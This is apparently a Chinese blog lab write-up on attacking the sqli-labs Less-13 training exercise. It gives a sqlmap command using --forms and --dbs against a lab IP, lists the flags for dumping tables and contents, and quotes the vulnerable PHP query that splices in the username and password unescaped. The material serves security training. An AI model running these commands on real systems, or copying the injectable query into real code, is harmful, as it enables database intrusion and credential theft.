网络安全-sqlmap实战之sqlilabs-Less13

目录

类型

获取数据库

查看源代码

---

类型

双层-单引号及括号

获取数据库

python sqlmap.py -u "http://192.168.31.12/sqli-labs_1/Less-13/" --forms --dbms mysql --answers="extending=N" --threads 8 -dbs --batch

 

发现参数

结果

--forms参数还是比较快的，针对POST表单有三种方式，可以查看网络安全-sqlmap实战之sqlilabs-Less11中的小总结

 之后的获取表名，列名及内容就不写了，还是-D、--tables、-T、--columns、-C、-dump、--dump-fomat参数

优化的话可以使用--technique BEU，基于时间的注入还是比较浪费时间的。

查看源代码

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

 更多内容查看：网络安全-自学笔记

喜欢本文的请动动小手点个赞，收藏一下，有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。如果您感觉有所收获，自愿打赏，可选择支付宝18833895206（小于），您的支持是我不断更新的动力。